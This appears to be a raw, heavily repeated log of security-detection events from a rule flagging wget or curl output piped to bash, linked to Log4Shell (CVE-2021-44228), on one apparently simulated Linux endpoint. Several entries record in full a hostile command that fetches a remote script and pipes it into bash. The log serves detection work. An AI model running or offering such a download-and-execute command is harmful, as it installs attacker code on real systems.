parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", 
firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", 
annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", 
annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", 
annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to 
download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool 
Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified 
on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", 
process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", 
parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", 
